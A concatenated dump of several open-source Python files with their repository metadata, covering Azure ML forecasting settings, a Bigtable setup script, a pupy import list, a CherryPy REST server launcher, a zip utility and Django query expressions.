:type short_series_handling_config: str
:param target_aggregate_function: The function to be used to aggregate the time series target column to conform
to a user specified frequency. If the target_aggregation_function is set, but the freq parameter is not set,
the error is raised. The possible target aggregation functions are: "sum", "max", "min" and "mean".
:type target_aggregate_function: str
:param time_column_name: The name of the time column.
:type time_column_name: str
:param time_series_id_column_names: The names of columns used to group a timeseries.
:type time_series_id_column_names: Union[str, List[str]]
"""
def __init__(
self,
*,
country_or_region_for_holidays: str = None,
cv_step_size: int = None,
forecast_horizon: Union[str, int] = None,
target_lags: Union[str, int, List[int]] = None,
target_rolling_window_size: Union[str, int] = None,
frequency: str = None,
feature_lags: str = None,
seasonality: Union[str, int] = None,
use_stl: str = None,
short_series_handling_config: str = None,
target_aggregate_function: str = None,
time_column_name: str = None,
time_series_id_column_names: Union[str, List[str]] = None,
):
self.country_or_region_for_holidays = country_or_region_for_holidays
self.cv_step_size = cv_step_size
self.forecast_horizon = forecast_horizon
self.target_lags = target_lags
self.target_rolling_window_size = target_rolling_window_size
self.frequency = frequency
self.feature_lags = feature_lags
self.seasonality = seasonality
self.use_stl = use_stl
self.short_series_handling_config = short_series_handling_config
self.target_aggregate_function = target_aggregate_function
self.time_column_name = time_column_name
self.time_series_id_column_names = time_series_id_column_names
def _to_rest_object(self) -> RestForecastingSettings:
forecast_horizon = None
if isinstance(self.forecast_horizon, str):
forecast_horizon = AutoForecastHorizon()
elif self.forecast_horizon:
forecast_horizon = CustomForecastHorizon(value=self.forecast_horizon)
target_lags = None
if isinstance(self.target_lags, str):
target_lags = AutoTargetLags()
elif self.target_lags:
lags = [self.target_lags] if not isinstance(self.target_lags, list) else self.target_lags
target_lags = CustomTargetLags(values=lags)
target_rolling_window_size = None
if isinstance(self.target_rolling_window_size, str):
target_rolling_window_size = AutoTargetRollingWindowSize()
elif self.target_rolling_window_size:
target_rolling_window_size = CustomTargetRollingWindowSize(value=self.target_rolling_window_size)
seasonality = None
if isinstance(self.seasonality, str):
seasonality = AutoSeasonality()
elif self.seasonality:
seasonality = CustomSeasonality(value=self.seasonality)
time_series_id_column_names = self.time_series_id_column_names
if isinstance(self.time_series_id_column_names, str) and self.time_series_id_column_names:
time_series_id_column_names = [self.time_series_id_column_names]
return RestForecastingSettings(
country_or_region_for_holidays=self.country_or_region_for_holidays,
cv_step_size=self.cv_step_size,
forecast_horizon=forecast_horizon,
time_column_name=self.time_column_name,
target_lags=target_lags,
target_rolling_window_size=target_rolling_window_size,
seasonality=seasonality,
frequency=self.frequency,
feature_lags=self.feature_lags,
use_stl=self.use_stl,
short_series_handling_config=self.short_series_handling_config,
target_aggregate_function=self.target_aggregate_function,
time_series_id_column_names=time_series_id_column_names,
)
@classmethod
def _from_rest_object(cls, obj: RestForecastingSettings) -> "ForecastingSettings":
forecast_horizon = None
if obj.forecast_horizon and obj.forecast_horizon.mode == ForecastHorizonMode.AUTO:
forecast_horizon = obj.forecast_horizon.mode.lower()
elif obj.forecast_horizon:
forecast_horizon = obj.forecast_horizon.value
rest_target_lags = obj.target_lags
target_lags = None
if rest_target_lags and rest_target_lags.mode == TargetLagsMode.AUTO:
target_lags = rest_target_lags.mode.lower()
elif rest_target_lags:
target_lags = rest_target_lags.values
target_rolling_window_size = None
if obj.target_rolling_window_size and obj.target_rolling_window_size.mode == TargetRollingWindowSizeMode.AUTO:
target_rolling_window_size = obj.target_rolling_window_size.mode.lower()
elif obj.target_rolling_window_size:
target_rolling_window_size = obj.target_rolling_window_size.value
seasonality = None
if obj.seasonality and obj.seasonality.mode == SeasonalityMode.AUTO:
seasonality = obj.seasonality.mode.lower()
elif obj.seasonality:
seasonality = obj.seasonality.value
return cls(
country_or_region_for_holidays=obj.country_or_region_for_holidays,
cv_step_size=obj.cv_step_size,
forecast_horizon=forecast_horizon,
target_lags=target_lags,
target_rolling_window_size=target_rolling_window_size,
frequency=obj.frequency,
feature_lags=obj.feature_lags,
seasonality=seasonality,
use_stl=obj.use_stl,
short_series_handling_config=obj.short_series_handling_config,
target_aggregate_function=obj.target_aggregate_function,
time_column_name=obj.time_column_name,
time_series_id_column_names=obj.time_series_id_column_names,
)
def __eq__(self, other: object) -> bool:
if not isinstance(other, ForecastingSettings):
return NotImplemented
return (
self.country_or_region_for_holidays == other.country_or_region_for_holidays
and self.cv_step_size == other.cv_step_size
and self.forecast_horizon == other.forecast_horizon
and self.target_lags == other.target_lags
and self.target_rolling_window_size == other.target_rolling_window_size
and self.frequency == other.frequency
and self.feature_lags == other.feature_lags
and self.seasonality == other.seasonality
and self.use_stl == other.use_stl
and self.short_series_handling_config == other.short_series_handling_config
and self.target_aggregate_function == other.target_aggregate_function
and self.time_column_name == other.time_column_name
and self.time_series_id_column_names == other.time_series_id_column_names
)
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
| {
"content_hash": "ebddfecf28c9b38f23ac17a2b74e1772",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 118,
"avg_line_length": 48.125,
"alnum_prop": 0.6742857142857143,
"repo_name": "Azure/azure-sdk-for-python",
"id": "24303737461dc9e580c6f37af96b3b2f1bb5819d",
"size": "9871",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/ml/azure-ai-ml/azure/ai/ml/entities/_job/automl/tabular/forecasting_settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages
from setuptools import setup
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(PACKAGE_ROOT, 'README.rst')) as file_obj:
README = file_obj.read()
# NOTE: This is duplicated throughout and we should try to
# consolidate.
SETUP_BASE = {
'author': 'Google Cloud Platform',
'author_email': 'jjg+google-cloud-python@google.com',
'scripts': [],
'url': 'https://github.com/GoogleCloudPlatform/google-cloud-python',
'license': 'Apache 2.0',
'platforms': 'Posix; MacOS X; Windows',
'include_package_data': True,
'zip_safe': False,
'classifiers': [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet',
],
}
REQUIREMENTS = [
'google-cloud-core >= 0.22.1, < 0.23dev',
'grpcio >= 1.0.2, < 2.0dev',
]
setup(
name='google-cloud-bigtable',
version='0.22.0',
description='Python Client for Google Cloud Bigtable',
long_description=README,
namespace_packages=[
'google',
'google.cloud',
],
packages=find_packages(),
install_requires=REQUIREMENTS,
**SETUP_BASE
)
| {
"content_hash": "5d59984a84982fe58e440b4f7c6ebc85",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 72,
"avg_line_length": 28.181818181818183,
"alnum_prop": 0.6161290322580645,
"repo_name": "quom/google-cloud-python",
"id": "08cd2eb7d6b46754e8e9c16d05fd43e061b47980",
"size": "2126",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bigtable/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62009"
},
{
"name": "Python",
"bytes": "3388266"
},
{
"name": "Shell",
"bytes": "7548"
}
],
"symlink_target": ""
} |
import socket
import threading
import Queue
import collections
import SocketServer
import struct
import os
import sys
import time
import traceback
import uuid
import subprocess
import StringIO
import imp
import hashlib
import base64
import logging
import re
import ssl
import tempfile
import string
import datetime
import random
import shutil
import platform
import errno, stat
import zlib
import tempfile
import code
import Queue
import glob
import multiprocessing
import math
import binascii
import inspect
import shlex
import json
import ctypes
import ctypes.wintypes
import threading
import time
import urllib
import urllib2
import socks
| {
"content_hash": "c83cac0a4283e1300ac580fe6d99d6cc",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 22,
"avg_line_length": 14.590909090909092,
"alnum_prop": 0.8582554517133957,
"repo_name": "xeddmc/pupy",
"id": "6cbd4d3d628f110e8944ff000e44e9a6822ed37f",
"size": "642",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "client/additional_imports.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4914"
},
{
"name": "C",
"bytes": "205080"
},
{
"name": "Python",
"bytes": "530306"
},
{
"name": "Shell",
"bytes": "85"
}
],
"symlink_target": ""
} |
import spur
__all__ = ["run", "RunProcessError"]
local_shell = spur.LocalShell()
run = local_shell.run
RunProcessError = spur.RunProcessError
| {
"content_hash": "df6a01410590071b99fda18ec875e001",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 38,
"avg_line_length": 13.454545454545455,
"alnum_prop": 0.7094594594594594,
"repo_name": "mwilliamson/whack",
"id": "98205c3aff7ca04b804436fbde5222f9023b8101",
"size": "148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "whack/local.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "530"
},
{
"name": "Python",
"bytes": "106682"
}
],
"symlink_target": ""
} |
"""Initialize and launch the onramp REST server."""
import logging
import os
import signal
import socket
import sys
import cherrypy
from cherrypy.process.plugins import Daemonizer, PIDFile
from configobj import ConfigObj
from validate import Validator
from PCE.dispatchers import APIMap, ClusterInfo, ClusterPing, Files, Jobs, \
Modules
from PCEHelper import pce_root
def _CORS():
"""Set HTTP Access Control Header to allow cross-site HTTP requests from
any origin.
"""
cherrypy.response.headers['Access-Control-Allow-Origin'] = '*'
def _term_handler(signal, frame):
"""Gracefully shutdown the server and exit.
This function is intended to be registered as a SIGTERM handler.
"""
logger = logging.getLogger('onramp')
logger.info('Shutting down server')
cherrypy.engine.exit()
logger.info('Exiting')
sys.exit(0)
def _restart_handler(signal, frame):
"""Restart the server.
This function is intended to be registered as a SIGHUP handler.
"""
logger = logging.getLogger('onramp')
logger.info('Restarting server')
# FIXME: This needs to reload the config, including attrs in
# onramp_pce_config.cfg.
cherrypy.engine.restart()
logger.debug('Blocking cherrypy engine')
cherrypy.engine.block()
if __name__ == '__main__':
# Default conf. Some of these can/will be overrided by attrs in
# onramp_pce_config.cfg.
conf = {
'global': {
'server.socket_host': socket.gethostbyname(socket.gethostname()),
'log.access_file': 'log/access.log',
'log.error_file': 'log/cherrypy_error.log',
'log.screen': False,
# Don't run CherryPy Checker on custom conf sections:
# FIXME: This setting doesn't seem to be working...
'checker.check_internal_config': False,
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.CORS.on': True
},
'internal': {
'PIDfile': os.path.join(os.getcwd(), 'src/.onrampRESTservice.pid'),
'log_level': 'INFO',
'onramp_log_file': 'log/onramp.log'
}
}
# Load onramp_pce_config.cfg and integrate appropriate attrs into cherrpy
# conf.
cfg = ConfigObj(os.path.join(pce_root, 'bin', 'onramp_pce_config.cfg'),
configspec=os.path.join(pce_root, 'src', 'configspecs',
'onramp_pce_config.cfgspec'))
cfg.validate(Validator())
if 'server' in cfg.keys():
for k in cfg['server']:
conf['global']['server.' + k] = cfg['server'][k]
if 'cluster' in cfg.keys():
if 'log_level' in cfg['cluster'].keys():
conf['internal']['log_level'] = cfg['cluster']['log_level']
if 'log_file' in cfg['cluster'].keys():
log_file = cfg['cluster']['log_file']
if not log_file.startswith('/'):
# Path is relative to onramp_pce_config.cfg location
log_file = cfg['cluster']['log_file']
conf['internal']['onramp_log_file'] = log_file
cherrypy.config.update(conf)
# Set up logging.
log_levels = {
'DEBUG': logging.DEBUG,
'INFO': logging.INFO,
'WARNING': logging.WARNING,
'ERROR': logging.ERROR,
'CRITICAL': logging.CRITICAL
}
log_name = 'onramp'
logger = logging.getLogger(log_name)
logger.setLevel(log_levels[conf['internal']['log_level']])
handler = logging.FileHandler(conf['internal']['onramp_log_file'])
handler.setFormatter(
logging.Formatter('[%(asctime)s] %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.info('Logging at %s to %s' % (conf['internal']['log_level'],
conf['internal']['onramp_log_file']))
# Log the PID
PIDFile(cherrypy.engine, conf['internal']['PIDfile']).subscribe()
Daemonizer(cherrypy.engine).subscribe()
cherrypy.tools.CORS = cherrypy.Tool('before_finalize', _CORS)
cherrypy.tree.mount(Modules(cfg, log_name), '/modules', conf)
cherrypy.tree.mount(Jobs(cfg, log_name), '/jobs', conf)
cherrypy.tree.mount(ClusterInfo(cfg, log_name), '/cluster/info', conf)
cherrypy.tree.mount(ClusterPing(cfg, log_name), '/cluster/ping', conf)
cherrypy.tree.mount(Files(cfg, log_name), '/files', conf)
cherrypy.tree.mount(APIMap(cfg, log_name), '/api', conf)
logger.info('Starting cherrypy engine')
cherrypy.engine.start()
logger.debug('Registering signal handlers')
signal.signal(signal.SIGTERM, _term_handler)
signal.signal(signal.SIGHUP, _restart_handler)
logger.debug('Blocking cherrypy engine')
cherrypy.engine.block()
| {
"content_hash": "3d2c4c2f09c7c28741cf59ed5485745c",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 79,
"avg_line_length": 35.66417910447761,
"alnum_prop": 0.6179116970077422,
"repo_name": "koepked/onramp",
"id": "b38d36dc17cf71900d09b272d29a14604fdc008b",
"size": "4805",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "pce/src/RESTservice.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1436045"
},
{
"name": "Gnuplot",
"bytes": "701"
},
{
"name": "Groff",
"bytes": "253441"
},
{
"name": "HTML",
"bytes": "584449"
},
{
"name": "JavaScript",
"bytes": "144082"
},
{
"name": "Makefile",
"bytes": "88349"
},
{
"name": "Perl",
"bytes": "5501"
},
{
"name": "Python",
"bytes": "406605"
},
{
"name": "Shell",
"bytes": "8072"
},
{
"name": "SourcePawn",
"bytes": "120276"
},
{
"name": "TeX",
"bytes": "82592"
}
],
"symlink_target": ""
} |
from zipfile import ZipFile, ZIP_DEFLATED
from optparse import OptionParser
parser = OptionParser()
## Make options for commandline available through -h
## -f/--files takes a commaseparated list of filenames _without_ paths
parser.add_option("-f", "--files", dest="filename",
help="List of files to compress", metavar="FILE")
## -p/--path takes the path for the supplied files
parser.add_option("-p", "--path", dest="path",
help="Path containing files", metavar="PATH")
## -o/--outpath takes the path where the zip is to be created
parser.add_option("-o", "--outpath", dest="outpath",
help="Outpath", metavar="OUTPATH")
## -z/--zipname takes the filename for the zip file
parser.add_option("-z", "--zipname", dest="zipname",
help="Name for zipfile", metavar="ZIPNAME")
(options, args) = parser.parse_args()
with ZipFile(options.outpath+options.zipname,'w',ZIP_DEFLATED) as z:
for item in options.filename.split(','):
print('Crunching '+item)
z.write(options.path+item,item)
z.close()
print(options.outpath+options.zipname)
| {
"content_hash": "85224165bf46f2f5ee4587968bab3b6e",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 71,
"avg_line_length": 38.89655172413793,
"alnum_prop": 0.6578014184397163,
"repo_name": "foag/pyzippr",
"id": "9db8c54505abd1c90b95cb4ba6c9d53c65ef57d0",
"size": "1261",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PyZippr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1261"
}
],
"symlink_target": ""
} |
import copy
import datetime
from django.conf import settings
from django.core.exceptions import FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query_utils import refs_aggregate
from django.utils import timezone
from django.utils.functional import cached_property
class CombinableMixin(object):
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return Expression(other, connector, self)
return Expression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rdiv__(self, other): # Python 2 compatibility
return type(self).__rtruediv__(self, other)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class ExpressionNode(CombinableMixin):
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
def get_db_converters(self, connection):
return [self.convert_value]
def __init__(self, output_field=None):
self._output_field = output_field
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(ExpressionNode, self).as_sql(compiler, connection)
setattr(ExpressionNode, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
Returns: an ExpressionNode to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
return c
def _prepare(self):
"""
Hook used by Field.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
Returns the output type of this expressions.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
self._output_field = sources[0]
for source in sources:
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, connection):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def refs_aggregate(self, existing_aggregates):
"""
Does this expression contain a reference to some of the
existing aggregates? If so, returns the aggregate and also
the lookup parts that *weren't* found. So, if
exsiting_aggregates = {'max_id': Max('id')}
self.name = 'max_id'
queryset.filter(max_id__range=[10,100])
then this method will return Max('id') and those parts of the
name that weren't found. In this case `max_id` is found and the range
portion is returned as ('range',).
"""
for node in self.get_source_expressions():
agg, lookup = node.refs_aggregate(existing_aggregates)
if agg:
return agg, lookup
return False, ()
def refs_field(self, aggregate_types, field_types):
"""
Helper method for check_aggregate_support on backends
"""
return any(
node.refs_field(aggregate_types, field_types)
for node in self.get_source_expressions())
def prepare_database_save(self, field):
return self
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
class Expression(ExpressionNode):
def __init__(self, lhs, connector, rhs, output_field=None):
super(Expression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField')
or (rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize)
return c
class DurationExpression(Expression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class F(CombinableMixin):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def refs_aggregate(self, existing_aggregates):
return refs_aggregate(self.name.split(LOOKUP_SEP), existing_aggregates)
class Func(ExpressionNode):
"""
A SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
def __init__(self, *expressions, **extra):
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else F(arg)
for arg in expressions
]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize)
return c
def as_sql(self, compiler, connection, function=None, template=None):
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
if function is None:
self.extra['function'] = self.extra.get('function', self.function)
else:
self.extra['function'] = function
self.extra['expressions'] = self.extra['field'] = self.arg_joiner.join(sql_parts)
template = template or self.extra.get('template', self.template)
return template % self.extra, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
class Value(ExpressionNode):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def as_sql(self, compiler, connection):
return '%s', [self.value]
class DurationValue(Value):
def as_sql(self, compiler, connection):
if (connection.features.has_native_duration_field and
connection.features.driver_supports_timedelta_args):
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class Col(ExpressionNode):
def __init__(self, alias, target, source=None):
if source is None:
source = target
super(Col, self).__init__(output_field=source)
self.alias, self.target = alias, target
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
class Ref(ExpressionNode):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.source = source
self.refs = refs
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % compiler.quote_name_unless_alias(self.refs), []
def get_group_by_cols(self):
return [self]
class Date(ExpressionNode):
"""
Add a date selection column.
"""
def __init__(self, lookup, lookup_type):
super(Date, self).__init__(output_field=fields.DateField())
self.lookup = lookup
self.col = None
self.lookup_type = lookup_type
def get_source_expressions(self):
return [self.col]
def set_source_expressions(self, exprs):
self.col, = exprs
def resolve_expression(self, query, allow_joins, reuse, summarize):
copy = self.copy()
copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
field = copy.col.output_field
assert isinstance(field, fields.DateField), "%r isn't a DateField." % field.name
if settings.USE_TZ:
assert not isinstance(field, fields.DateTimeField), (
"%r is a DateTimeField, not a DateField." % field.name
)
return copy
def as_sql(self, compiler, connection):
sql, params = self.col.as_sql(compiler, connection)
assert not(params)
return connection.ops.date_trunc_sql(self.lookup_type, sql), []
def copy(self):
copy = super(Date, self).copy()
copy.lookup = self.lookup
copy.lookup_type = self.lookup_type
return copy
def convert_value(self, value, connection):
if isinstance(value, datetime.datetime):
value = value.date()
return value
class DateTime(ExpressionNode):
"""
Add a datetime selection column.
"""
def __init__(self, lookup, lookup_type, tzinfo):
super(DateTime, self).__init__(output_field=fields.DateTimeField())
self.lookup = lookup
self.col = None
self.lookup_type = lookup_type
if tzinfo is None:
self.tzname = None
else:
self.tzname = timezone._get_timezone_name(tzinfo)
self.tzinfo = tzinfo
def get_source_expressions(self):
return [self.col]
def set_source_expressions(self, exprs):
self.col, = exprs
def resolve_expression(self, query, allow_joins, reuse, summarize):
copy = self.copy()
copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
field = copy.col.output_field
assert isinstance(field, fields.DateTimeField), (
"%r isn't a DateTimeField." % field.name
)
return copy
def as_sql(self, compiler, connection):
sql, params = self.col.as_sql(compiler, connection)
assert not(params)
return connection.ops.datetime_trunc_sql(self.lookup_type, sql, self.tzname)
def copy(self):
copy = super(DateTime, self).copy()
copy.lookup = self.lookup
copy.lookup_type = self.lookup_type
copy.tzname = self.tzname
return copy
def convert_value(self, value, connection):
if settings.USE_TZ:
if value is None:
raise ValueError(
"Database returned an invalid value in QuerySet.datetimes(). "
"Are time zone definitions for your database and pytz installed?"
)
value = value.replace(tzinfo=None)
value = timezone.make_aware(value, self.tzinfo)
return value
| {
"content_hash": "244007c0a21722f97baa5220f4de37d5",
"timestamp": "",
"source": "github",
"line_count": 636,
"max_line_length": 102,
"avg_line_length": 33.611635220125784,
"alnum_prop": 0.6109369883519671,
"repo_name": "edevil/django",
"id": "ac69307edc50010dea00f99b9feebe6820af57dd",
"size": "21377",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "django/db/models/expressions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "53429"
},
{
